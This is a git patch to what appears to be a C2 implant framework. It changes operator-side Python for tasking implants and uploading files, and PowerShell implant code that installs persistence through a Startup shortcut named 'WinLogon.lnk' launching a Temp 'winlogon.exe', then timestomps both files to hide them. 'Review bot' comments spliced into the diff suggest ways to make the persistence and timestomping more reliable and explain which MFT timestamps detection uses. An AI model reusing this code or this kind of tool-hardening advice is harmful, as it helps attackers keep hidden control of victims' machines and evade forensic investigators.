From 4f4b8610a2f1f768ce8c54be2b26666f04e8233b Mon Sep 17 00:00:00 2001
From: benpturner
Date: Thu, 9 Aug 2018 10:40:35 +0100
Subject: [PATCH] Updated InstallEXE-Persistence

---
 ImplantHandler.py | 24 ++++++++++++----------
 Modules/Implant-Core.ps1 | 44 +++++++++++++++++++++++++---------------
 Tasks.py | 3 ++-
 3 files changed, 43 insertions(+), 28 deletions(-)

diff --git a/ImplantHandler.py b/ImplantHandler.py
index a84fdd2..371027c 100644
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
@@ -397,7 +397,15 @@ def runcommand(command, randomuri):
 command = command.replace('sleep ', '')
 command = command.replace('beacon ', '')
 update_sleep(command, randomuri)
-
+
+ elif "searchhelp" in command.lower():
+ searchterm = (command.lower()).replace("searchhelp ","")
+ import string
+ helpfull = string.split(posh_help, '\n')
+ for line in helpfull:
+ if searchterm in line:
+ print line
+
 elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
 startup()

@@ -674,8 +682,10 @@ def runcommand(command, randomuri):
 s = source_file.read()
 source = base64.b64encode(s)
 if s:
- destination = (args.destination).replace("\\","\\\\")
- uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (args.destination, source)
+ destination = args.destination.replace("\\","\\\\")
+ print ""
+ print "Uploading %s to %s" % (args.source, destination)
+ uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source)
 new_task(uploadcommand, randomuri)
 except Exception as e:
 print "Error with source file: %s" % e
@@ -739,14 +749,6 @@ def runcommand(command, randomuri):
 except Exception as e:
 print "Error loading file: %s" % e

- elif "searchhelp" in command.lower():
- searchterm = (command.lower()).replace("searchhelp ","")
- import string
- helpfull = string.split(posh_help, '\n')
- for line in helpfull:
- if searchterm in line:
- print line
-
 elif "listmodules" in command.lower():
 print os.listdir("%s/Modules/" % POSHDIR)
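Review bot: Moving this branch ahead of the others makes its substring test `"searchhelp" in command.lower()` more consequential: any later command whose text merely contains the word (a filename argument, for instance) is now swallowed here, and `replace("searchhelp ","")` leaves `searchterm` as `searchhelp` when the operator types the command with no argument, so nothing useful is printed. Anchoring it with `elif command.lower().startswith("searchhelp"):` and `searchterm = command.lower()[len("searchhelp"):].strip()` fixes both, and an empty term can then fall back to printing the whole help text. The function-scope `import string` plus Python 2 `string.split(posh_help, '\n')` can be replaced by `posh_help.splitlines()`, which needs no import. runcommand begins before this hunk and continues after it.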
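Review bot: The new progress line `print "Uploading %s to %s" % (args.source, destination)` echoes the backslash-doubled form, so a destination typed as `C:\Temp\x.exe` is shown as `C:\\Temp\\x.exe`; print `args.destination` there and keep the doubled `destination` only for the task string. That string is then placed inside a PowerShell double-quoted literal on the implant, where `\` is not an escape character but `$`, backtick and `"` are still interpreted, presumably on purpose so that paths like `$env:Temp\Winlogon.exe` expand host-side; a one-line comment stating why the backslashes are doubled and that `$env:` expansion is relied on would stop the next reader from "fixing" either. Note also that an empty source file still hits the silent `if s:` branch with no message, which the new output line makes more noticeable. runcommand begins before this hunk and continues after it.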
diff --git a/Modules/Implant-Core.ps1 b/Modules/Implant-Core.ps1
index d6773b9..fa0bcaa 100644
--- a/Modules/Implant-Core.ps1
+++ b/Modules/Implant-Core.ps1
@@ -202,28 +202,40 @@ Function Install-Persistence
 }
 }
 Function InstallExe-Persistence() {
- $SourceEXE = "rundll32.exe"
- $ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
- $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
- $WshShell = New-Object -comObject WScript.Shell
- $Shortcut = $WshShell.CreateShortcut($DestinationPath)
- $Shortcut.TargetPath = $SourceEXE
- $Shortcut.Arguments = $ArgumentsToSourceExe
- $Shortcut.WindowStyle = 7
- $Shortcut.Save()
- TimeStomp $DestinationPath "01/03/2008 12:12 pm"
- If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
- Write-Output "Created StartUp file Exe persistence: $DestinationPath"
+ if (Test-Path "$env:Temp\Winlogon.exe") {
+ $SourceEXE = "rundll32.exe"
+ $ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
+ $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
+ $WshShell = New-Object -comObject WScript.Shell
+ $Shortcut = $WshShell.CreateShortcut($DestinationPath)
+ $Shortcut.TargetPath = $SourceEXE
+ $Shortcut.Arguments = $ArgumentsToSourceExe
+ $Shortcut.WindowStyle = 7
+ $Shortcut.Save()
+ TimeStomp $DestinationPath "01/03/2008 12:12 pm"
+ TimeStomp "$env:Temp\Winlogon.exe" "01/03/2008 12:12 pm"
+ If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
+ Write-Output "Created StartUp file Exe persistence: $DestinationPath"
+ } else {
+ Write-Output "Error installing StartUp Exe persistence"
+ Write-Output "Upload EXE to $env:Temp\Winlogon.exe"
+ }
 } else {
 Write-Output "Error installing StartUp Exe persistence"
+ Write-Output "Upload EXE to $env:Temp\Winlogon.exe"
 }
 }
 Function RemoveExe-Persistence() {
 $DestinationPath1 = "$env:Temp\winlogon.exe"
- Remove-Item -Force $DestinationPath1
+ If (Test-Path $DestinationPath1) {
+ Remove-Item -Force $DestinationPath1
+ }
+
 $DestinationPath2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
- Remove-Item -Force $DestinationPath2
- TimeStomp $DestinationPath "01/03/2008 12:12 pm"
+ If (Test-Path $DestinationPath2) {
+ Remove-Item -Force $DestinationPath2
+ }
+
 If ((Test-Path $DestinationPath1) -or ((Test-Path $DestinationPath2))) {
 Write-Output "Unable to Remove Persistence"
 } else {
@@ -726,7 +738,7 @@ elseif ([IntPtr]::size -eq 4) {
 }
 }
 Function TimeStomp($File, $Date) {
- $file=(gi $file)
+ $file=(gi $file -force)
 $file.LastWriteTime=$date;
 $file.LastAccessTime=$date;
 $file.CreationTime=$date;
diff --git a/Tasks.py b/Tasks.py
index c5ddef3..ccba1df 100644
--- a/Tasks.py
+++ b/Tasks.py
@@ -16,8 +16,9 @@ def newTask(path):
 for a in tasks:
 command = a[2]
 hostinfo = DB.get_hostinfo(RandomURI)
+ now = datetime.datetime.now()
 print Colours.YELLOW,""
- print "Command issued against implant %s on host %s %s" % (hostinfo[0],hostinfo[3],hostinfo[11])
+ print "Command issued against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
 if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
 print "Loading Shellcode",Colours.END
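Review bot: In the new InstallExe-Persistence body the inner `} else {` prints exactly the same two lines as the outer one, so the operator cannot tell whether Winlogon.exe was missing or the shortcut was not written; since the outer guard has already confirmed the EXE, the inner test can shrink to `If (Test-Path $DestinationPath) {` and its else branch report the actual failure, e.g. `Write-Output "Error creating StartUp shortcut: $DestinationPath"`. Nothing in the hunk catches failures from `New-Object -comObject WScript.Shell` or `$Shortcut.Save()` (WSH disabled by policy, Startup folder redirected or write-blocked), so unless a handler outside this hunk wraps the call the implant returns a raw exception instead of these messages; a `try { ... } catch { Write-Output "Error creating shortcut: $_" }` around the shortcut creation would keep the output uniform. In RemoveExe-Persistence, `Remove-Item -Force` on a Winlogon.exe that is currently executing fails with a non-terminating error, and the final Test-Path check then reports "Unable to Remove Persistence" without saying why; adding `-ErrorAction SilentlyContinue` and mentioning the running process in that message would make the failure actionable. RemoveExe-Persistence continues past the end of the hunk.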
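Review bot: The added `-force` lets `gi` resolve hidden or system items, but TimeStomp still carries no comment on what it does and does not cover: assigning LastWriteTime, LastAccessTime and CreationTime through the FileInfo object rewrites only the $STANDARD_INFORMATION timestamps, while the $FILE_NAME attribute in the MFT keeps its original values, which is typically what timestomp detection compares. A header comment such as `# Rewrites $STANDARD_INFORMATION timestamps only; MFT $FILE_NAME times are unchanged and can still reveal the stomp` would set operator expectations. If `gi` still fails, `$file` is `$null` and the three assignments throw property errors; guarding with `if ($file) { ... }` or adding `-ErrorAction Stop` would be tidier, though the caller's new Test-Path guard makes that case rare. The function's closing brace lies outside the hunk.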